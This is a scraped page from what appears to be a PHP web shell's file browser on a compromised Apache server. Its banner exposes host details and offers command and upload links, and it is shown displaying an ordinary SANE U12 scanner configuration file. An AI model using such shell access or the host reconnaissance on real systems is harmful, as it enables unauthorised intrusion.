|
Server IP : 10.2.73.233 / Your IP : 216.73.216.59 Web Server : Apache/2.4.59 (Debian) System : Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64 User : www-data ( 33) PHP Version : 5.6.40-64+0~20230107.71+debian10~1.gbp673146 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /etc/sane.d/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
# U12-SANE Backend configuration file # # each device needs at least two lines: # - [usb] vendor-ID and product-ID # - device devicename # i.e. for Plustek (0x07B3) U1212 (0x0001) # [usb] 0x07B3 0x0001 # device /dev/usbscanner # or # device libusb:bbb:ddd # where bbb is the busnumber and ddd the device number # make sure that your user has access to /proc/bus/usb/bbb/ddd # # additionally you can specify some options # warmup, lOffOnEnd, lampOff # # For autodetection use # [usb] # device /dev/usbscanner # # or simply # [usb] # # or if you want a specific device but you have no idea about the # device node or you use libusb, simply set vendor- and product-ID # [usb] 0x07B3 0x0001 # device auto # # NOTE: autodetection is safe, as it uses the info it got # from the USB subsystem. If you're not using the # autodetection, you MUST have attached that device # at your USB-port, that you have specified... # [usb] # # options for the previous USB entry # # switch lamp off after xxx secs, 0 disables the feature option lampOff 300 # warmup period in seconds, 0 means no warmup option warmup 15 # 0 means leave lamp-status untouched, not 0 means switch off # on sane_close option lOffOnEnd 1 # # for adjusting the default gamma values # #option redGamma 1.5 #option greenGamma 1.5 #option blueGamma 1.5 #option grayGamma 1.5 # # and of course the device-name # device auto # # to define a new device, start with a new section: # [usb] #